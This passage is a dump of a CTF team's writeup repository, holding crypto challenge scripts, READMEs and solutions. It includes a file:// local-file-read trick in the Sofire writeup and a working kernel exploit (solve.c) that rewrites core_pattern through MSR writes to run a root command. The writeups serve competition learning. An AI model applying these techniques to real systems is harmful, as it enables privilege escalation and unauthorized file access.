https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/knock/knockd.pcap -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/streams/stream.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/streams/stream.pcap -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/streams/stream2.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/streams/stream2.pcap -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/README.md: -------------------------------------------------------------------------------- 1 | # ASIS Quals 2021 2 | 3 | Team: BitK, XeR, SakiiR, Posix, Shalom 4 | 5 | ### Table of contents 6 | 7 | * [Crypto warmup(crypto)](crypto_warmup) 8 | * [Madras(crypto)](madras) 9 | * [Spiritual(crypto)](spiritual) 10 | * [Pinhole(crypto)](pinhole) 11 | * [Factory(for)](factory) 12 | -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/crypto_warmup/Warmup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from Crypto.Util.number import * 4 | import string 5 | from secret import is_valid, flag 6 | 7 | def random_str(l): 8 | rstr = '' 9 | for _ in range(l): 10 | rstr += string.printable[:94][getRandomRange(0, 93)] 11 | return rstr 12 | 13 | def encrypt(msg, nbit): 14 | l, p = len(msg), getPrime(nbit) 15 | rstr = random_str(p - l) 16 | msg += rstr 17 | while True: 18 | s = getRandomNBitInteger(1024) 19 | if is_valid(s, p): 20 | break 21 | enc = msg[0] 22 | for i in range(p-1): 23 | enc += msg[pow(s, i, p)] 24 | return enc 25 | 26 | nbit = 15 27 | enc = encrypt(flag, nbit) 28 | print(f'enc = {enc}') -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/factory/factory.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-10-23-ASIS-quals/factory/factory.pdf -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/madras/Madras.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from Crypto.Util.number import * 4 | from flag import FLAG 5 | 6 | def gentuple(nbit): 7 | a, b, c = [getPrime(nbit // 3) for _ in '012'] 8 | return a, b, c 9 | 10 | def encrypt(msg, params): 11 | a, b, c = params 12 | e, n = 65537, a * b * c 13 | m = bytes_to_long(msg) 14 | assert m < n 15 | enc = pow(m, e, n) 16 | return enc 17 | 18 | nbit = 513 19 | a, b, c = gentuple(nbit) 20 | enc = encrypt(FLAG, (a, b, c)) 21 | 22 | print(f'a*b + c = {a*b + c}') 23 | print(f'b*c + a = {b*c + a}') 24 | print(f'c*a + b = {c*a + b}') 25 | print(f'enc % a = {enc % a}') 26 | print(f'enc % b = {enc % b}') 27 | print(f'enc % c = {enc % c}') 28 | print(f'enc = {enc}') -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/madras/output.txt: -------------------------------------------------------------------------------- 1 | a*b + c = 4553352994596121904719118095314305574744898996748617662645730434291671964711800262656927311612741715902 2 | b*c + a = 4414187148384348278031172865715942397786003125047353436418952679980677617016484927045195450392723110402 3 | c*a + b = 2621331497797998680087841425011881226283342008022511638116013676175393387095787512291008541271355772802 4 | enc % a = 1235691098253903868470929520042453631250042769029968 5 | enc % b = 2235727505835415157472856687960365216626058343546572 6 | enc % c = 1197976933648163722609601772402895844093866589777721 7 | enc = 6238548897897912462708514382106387305984378113132192980353695746912882399991285268937548949835500837749446265632471076030233510866260067177632747513323223 8 | -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/pinhole/pinhole.sage: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sage 2 | 3 | from sage.all import * 4 | from Crypto.Util.number import * 5 | from secret import a, flag 6 | 7 | def random_poly(degree): 8 | R. = ZZ[] 9 | f = x**degree 10 | for i in range(1, degree): 11 | f += randint(-3, 3) * x ** (degree - i) 12 | return f 13 | 14 | def genkey(a): 15 | M, N = [SL2Z.random_element() for _ in '01'] 16 | 17 | A = N * matrix(ZZ, [[0, -1], [1, 1]]) * N**(-1) 18 | B = N * matrix(ZZ, [[0, -1], [1, 0]]) * N**(-1) 19 | r, s = [randint(5, 14) for _ in '01'] 20 | U, V = (B * A) ** r, (B * A**2) ** s 21 | 22 | F = [] 23 | for _ in range(2): 24 | Ux = [random_poly(randint(1, 4)) for _ in range(4)] 25 | Ux = [Ux[i] - Ux[i](a) + U[i // 2][i % 2] for i in range(4)] 26 | Ux = matrix([[Ux[0], Ux[1]], [Ux[2], Ux[3]]]) 27 | F.append(Ux) 28 | 29 | X, Y = M * F[0] * M ** (-1), M * F[1] * M ** (-1) 30 | pubkey, privkey = (X, Y), (M, a) 31 | return pubkey, privkey 32 | 33 | def encrypt(msg, pubkey): 34 | X, Y = pubkey 35 | C = Y 36 | for b in msg: 37 | C *= X ** (int(b) + 1) * Y 38 | return C 39 | 40 | pubkey, privkey = genkey(a) 41 | msg = bin(bytes_to_long(flag.lstrip(b'ASIS{').rstrip(b'}')))[2:] 42 | enc = encrypt(msg, pubkey) 43 | 44 | print(f'pubkey = {pubkey}') 45 | print(f'enc = {enc}') -------------------------------------------------------------------------------- /2023-01-13-idekctf/README.md: -------------------------------------------------------------------------------- 1 | # idekCTF 2022 2 | 3 | Team: mastho, Shalom, XeR 4 | 5 | ### Table of contents 6 | * [Typop (pwn)](typop) 7 | * [Sprinter (pwn)](sprinter) 8 | * [Relativity (pwn)](relativity) 9 | * [Weep (pwn)](weep) 10 | * [Sofire=good (pwn)](sofire) 11 | * [Coroutine (pwn)](coroutine) 12 | * [MinkyMomo (pwn)](minkymomo) 13 | * [Cleithrophobia (crypto)](cleithrophobia) 14 | -------------------------------------------------------------------------------- /2023-01-13-idekctf/sofire/README.md: -------------------------------------------------------------------------------- 1 | # Sofire=good - idekCTF 2022 (pwn, 7 solved, 497p) 2 | 3 | ## Introduction 4 | Sofire=good is a pwn task. 5 | 6 | An archive containing a kernel, a ram disk, source code and boilerplate code is 7 | provided. 8 | 9 | ## Reverse engineering 10 | The challenge first asks the user for a URL to fetch and download an exploit. 11 | 12 | ```python 13 | # Downloading the user's exploit executable. 14 | try: 15 | with urllib.request.urlopen(url) as f: 16 | exploit = f.read() 17 | except Exception: 18 | print("Some error occurred while downloading your exploit executable. Try again or contact support :(\n") 19 | exit(-1) 20 | else: 21 | # Saving the user's exploit executable to a tmp disk file. 22 | with open(path, "wb") as f: 23 | f.write(exploit) 24 | ``` 25 | 26 | Then, the virtual machine is started with the exploit in `/mnt`. 27 | 28 | Very little time was spent trying to actually understand the challenge. 29 | 30 | ## Vulnerability 31 | There is an unintended vulnerability in the wrapper script. By specifying a URL 32 | starting with `file://`, it is possible to fetch local files in the virtual 33 | machine. 34 | 35 | ## Exploitation 36 | The exploitation of this unintended vulnerability is trivial. The 37 | `/home/user/initramfs.cpio` file contains the flag. 38 | 39 | ``` 40 | % ncat --ssl sofirium-97f5551e54f58151.instancer.idek.team 1337 41 | Give me the URL to your exploit executable (press enter to skip): file:///home/user/initramfs.cpio 42 | 43 | [...] 44 | 45 | / $ cd /tmp/mount 46 | cd /tmp/mount 47 | 48 | /tmp/mount $ ls 49 | ls 50 | 17d3c4bf-58a9-440e-84e7-59608c5e8380 51 | 52 | /tmp/mount $ cpio -i flag.txt < 17d3c4bf-58a9-440e-84e7-59608c5e8380 53 | cpio -i flag.txt < 17d3c4bf-58a9-440e-84e7-59608c5e8380 54 | 5788 blocks 55 | 56 | /tmp/mount $ cat flag.txt 57 | cat flag.txt 58 | idek{n0N_r3fuNd48lE_tr@s#_0n_7h3_k3rn3l_(h41n} 59 | ``` 60 | 61 | **Flag**: `idek{n0N_r3fuNd48lE_tr@s#_0n_7h3_k3rn3l_(h41n}` 62 | -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/README.md: -------------------------------------------------------------------------------- 1 | # p4ctf 2023 finals 2 | 3 | Team: XeR, mrexodia, Shalom 4 | 5 | ### Table of contents 6 | * [rsa kebab (crypto)](rsa_kebab) 7 | * [pallas (crypto)](pallas) 8 | * [aes observed (crypto)](aes_observed) 9 | * [narco chat (misc)](narco_chat) 10 | * [ancient kingdom (web)](ancient) 11 | * [pepega packets (misc)](pepega) 12 | * [scoundrelike (re)](scoundrelike) 13 | -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/narco_chat/client.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-06-21-p4ctf-finals/narco_chat/client.pyc -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/pepega/README.md: -------------------------------------------------------------------------------- 1 | # Pepega packets (misc, 5 solves, 395p) 2 | 3 | ## Introduction 4 | 5 | We get golang source code of some [server](server.go) to work with, and network access to where this is running. 6 | 7 | ## Task analysis 8 | 9 | The code is pretty straightforward: 10 | 11 | 1. There is a loop which goes over all packets and "bans" the sender for a minute. 12 | 2. There is `/flag` endpoint which will return a flag if we can stay "not banned" for 5 seconds. 13 | 14 | So the goal is to somehow not get banned for long enough to retrieve the flag. 15 | 16 | ## Solution 17 | 18 | The "unintended", although very popular, way to solve this was to simply flood the server. 19 | The idea was that flooding the server with lots of packets will either: 20 | 21 | 1. Make the banning loop backlog long enough to not reach our flag request before 5 seconds expire 22 | 2. Overflow the packets buffer so that `GetPacketStream` will skip some packets bettween the executions of `workerFirewall` 23 | 24 | Regardless of what exectly happened, this was enough to retrieve the flag: `p4{wow-you-are-very-fast-pepega!}` 25 | -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/scoundrelike/scoundrelike: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-06-21-p4ctf-finals/scoundrelike/scoundrelike -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/README.md: -------------------------------------------------------------------------------- 1 | # LakeCTF Quals 2023 2 | 3 | Team: XeR, Sebbb, Shalom 4 | 5 | ### Table of contents 6 | 7 | * [vimjail 1&2 (misc)](vimjail) 8 | * [Vigenere-CBC (crypto)](vigenere_cbc) 9 | * [KeySharer (crypto)](ecc_key_sharer) 10 | * [RandomRSA (crypto)](random_rsa) 11 | * [dive in the lake (re)](dive) 12 | * [FUNTRAN (re)](funtran) 13 | -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/dive/dive: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-11-04-lakeCTF-quals/dive/dive -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/funtran/arrayops.f90: -------------------------------------------------------------------------------- 1 | module arrayops 2 | use types, only: dp 3 | implicit none 4 | private 5 | 6 | public :: arange, linspace, diff, midpoints, full, zeros, ones 7 | 8 | contains 9 | 10 | pure function diff(x) result(r) 11 | real(dp), intent(in) :: x(:) 12 | real(dp) :: r(size(x)-1) 13 | integer :: i 14 | 15 | do i = 1, size(x)-1 16 | r(i) = x(i+1) - x(i) 17 | end do 18 | end function diff 19 | 20 | pure function midpoints(x) result(r) 21 | real(dp), intent(in) :: x(:) 22 | real(dp) :: r(size(x)-1) 23 | integer :: n 24 | n = size(x) 25 | r = (x(2:n) + x(1:n-1)) / 2.0_dp 26 | end function midpoints 27 | 28 | pure function arange(n) result(r) 29 | integer, intent(in) :: n 30 | real(dp) :: r(n) 31 | integer :: i 32 | r = [(real(i-1, dp), i=1,n)] 33 | end function arange 34 | 35 | pure function linspace(x_min, x_max, n) result(r) 36 | real(dp), intent(in) :: x_min, x_max 37 | integer, intent(in) :: n 38 | real(dp) :: r(n) 39 | 40 | r = x_min + (x_max-x_min)/(real(n, dp)-1.0_dp)*arange(n) 41 | end function linspace 42 | 43 | pure function full(n, s) result(r) 44 | integer, intent(in) :: n 45 | real(dp), intent(in) :: s 46 | real(dp) :: r(n) 47 | integer :: i 48 | 49 | r = [(s, i=1, n)] 50 | end function full 51 | 52 | pure function zeros(n) result(r) 53 | integer, intent(in) :: n 54 | real(dp) :: r(n) 55 | r = full(n, 0.0_dp) 56 | end function zeros 57 | 58 | pure function ones(n) result(r) 59 | integer, intent(in) :: n 60 | real(dp) :: r(n) 61 | r = full(n, 1.0_dp) 62 | end function ones 63 | end module arrayops -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/funtran/funtran: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-11-04-lakeCTF-quals/funtran/funtran -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/random_rsa/randomrsa.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env -S python3 -u 2 | import os 3 | from Crypto.Util.number import isPrime, bytes_to_long 4 | import random 5 | 6 | def getPrime(n_bits, verbose=False): 7 | while True: 8 | a = random.getrandbits(n_bits) 9 | if isPrime(a): 10 | return a 11 | elif verbose: 12 | print(f"Sadly, {a} was not prime") 13 | 14 | p = getPrime(1024, verbose=True) 15 | q = getPrime(1024) 16 | 17 | flag = os.getenv("flag","EPFL{fake_flag}").encode() 18 | n = p * q 19 | e = 65537 20 | print(f"Ciphertext: {pow(bytes_to_long(flag), e, n)}") -------------------------------------------------------------------------------- /2024-01-06-IrisCTF/README.md: -------------------------------------------------------------------------------- 1 | # IrisCTF 2024 2 | 3 | Team: BitK, erdnaxe, mastho, p4zuu, Sebbb, W00dy, XeR 4 | 5 | ### Table of contents 6 | * [Baby Charge (crypto)](babycharge) 7 | * [Accessible Sesamum Indicum (crypto)](asi) 8 | * [dhash (crypto)](dhash) 9 | * [Integral Communication (crypto)](integralcommunication) 10 | * [Memory (pwn)](memory) 11 | * [Serious Banking (pwn)](seriousbanking) 12 | -------------------------------------------------------------------------------- /2024-01-06-IrisCTF/asi/README.md: -------------------------------------------------------------------------------- 1 | # Accessible Sesamum Indicum - IrisCTF 2024 (crypto, 133 solved, 50p) 2 | 3 | ## Introduction 4 | Accessible Sesamum Indicum is a cryptography task. 5 | 6 | A Python script simulating vaults with a 4-digit PIN codes is given. 7 | 8 | ## Analysis 9 | The script simulates a vault with an hexadecimal keypad. Trying every pins 10 | (0000, 0001, 0002, etc.) will require pressing 4 × 16⁴ keys. This is 4 times 11 | above the limit of 65536 keys. 12 | 13 | Opening multiple connections to the remote server until the randomly-selected 14 | PIN is in the lower quarter will not work, because there are 16 vaults to solve. 15 | The probability of succeeding 16 times in a row is (1/4)¹⁶ ≃ 2e-10. 16 | 17 | ## Exploitation 18 | This problem can be solved with a [de Bruijn sequence](https://en.wikipedia.org/wiki/De_bruijn_sequence) 19 | 20 | **Flag**: `irisctf{de_bru1jn_s3quenc3s_c4n_mass1vely_sp33d_up_bru7e_t1me_f0r_p1ns}` 21 | 22 | ## Appendices 23 | ### solve.py 24 | ```python 25 | import pwn 26 | 27 | db = pwn.de_bruijn("0123456789abcdef", 16) 28 | for i in range(16): 29 | print(db) 30 | ``` 31 | -------------------------------------------------------------------------------- /2024-01-27-RealWorldCTF/README.md: -------------------------------------------------------------------------------- 1 | # Real World CTF 6th 2 | 3 | Team: BitK, erdnaxe, p4zuu, Rastislonge, SakiiR, Sebbb, SIben, Vozec, W00dy, XeR 4 | 5 | ### Table of contents 6 | * [The truth of Plain (crypto)](truthplain) 7 | * [Let's party in the house (pwn)](partyhouse) 8 | * [minioday (web)](minioday) 9 | -------------------------------------------------------------------------------- /2024-03-15-KalmarCTF/msrable/exploit/Makefile: -------------------------------------------------------------------------------- 1 | CC = x86_64-linux-musl-gcc 2 | 3 | pwn: 4 | as -o pwn.o pwn.S 5 | $(CC) solve.c -o solve -static pwn.o -z noexecstack 6 | 7 | clean: 8 | rm pwn.o solve 9 | -------------------------------------------------------------------------------- /2024-03-15-KalmarCTF/msrable/exploit/solve.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | extern uint64_t pwn(int fd, uint64_t kernel_base, size_t index, char new_char); 10 | 11 | #define MSR_LSTAR 0xc0000082 12 | #define MSR_FMASK 0xc0000084 13 | #define MSR_LSTAR_OFFSET 0x800040 14 | 15 | static uint64_t kernel_base = 0; 16 | 17 | void rdmsr(int fd, uint64_t *ptr, uint64_t len, uint32_t reg) { 18 | syscall(SYS_pread64, fd, ptr, len, reg); 19 | } 20 | 21 | void wrmsr(int fd, uint64_t *ptr, uint64_t len, uint32_t reg) { 22 | syscall(SYS_pwrite64, fd, ptr, len, reg); 23 | } 24 | 25 | int main(void) 26 | { 27 | int fd; 28 | 29 | fd = open("/dev/cpu/0/msr", O_RDWR); 30 | assert(fd > 0); 31 | 32 | uint64_t msr_lstar = 0; 33 | rdmsr(fd, &msr_lstar, sizeof(msr_lstar), MSR_LSTAR); 34 | 35 | printf("[+] MSR_LSTAR: %lx\n", msr_lstar); 36 | 37 | kernel_base = msr_lstar - MSR_LSTAR_OFFSET; 38 | printf("[+] Kernel base: %lx\n", kernel_base); 39 | 40 | uint64_t eflags = 0; 41 | rdmsr(fd, &eflags, sizeof(eflags), MSR_FMASK); 42 | eflags &= ~(1ULL << 18); 43 | wrmsr(fd, &eflags, sizeof(eflags), MSR_FMASK); 44 | 45 | char *new_core_pattern = "|/bin/chmod 777 /flag"; 46 | for (size_t i = 0; i < strlen(new_core_pattern); i++) 47 | pwn(fd, kernel_base, i, new_core_pattern[i]); 48 | 49 | printf("[+] core_pattern overwritten\n"); 50 | 51 | puts("[+] Triggering payload..."); 52 | uint8_t trigger = *(uint8_t *)(0xdeadbeef); 53 | 54 | return 0; 55 | } 56 | -------------------------------------------------------------------------------- /2024-06-30-UIUCTF/README.md: -------------------------------------------------------------------------------- 1 | # UIUCTF 2024 2 | 3 | ### Table of contents 4 | * [Picoify](picoify) 5 | -------------------------------------------------------------------------------- /2024-06-30-UIUCTF/picoify/meme75.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2024-06-30-UIUCTF/picoify/meme75.jpg -------------------------------------------------------------------------------- /2024-06-30-UIUCTF/picoify/memescore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2024-06-30-UIUCTF/picoify/memescore.jpg -------------------------------------------------------------------------------- /2024-06-30-UIUCTF/picoify/pic16.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2024-06-30-UIUCTF/picoify/pic16.jpg -------------------------------------------------------------------------------- /2025-01-05-IrisCTF/README.md: -------------------------------------------------------------------------------- 1 | # IrisCTF 2025 2 | 3 | ### Table of contents 4 | * [Spicy Messaging Sinusoids (radio)](spicy_messaging_sinusoids) 5 | -------------------------------------------------------------------------------- /2025-01-05-IrisCTF/spicy_messaging_sinusoids/inspectrum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2025-01-05-IrisCTF/spicy_messaging_sinusoids/inspectrum.png -------------------------------------------------------------------------------- /2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh1.png -------------------------------------------------------------------------------- /2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh2.png --------------------------------------------------------------------------------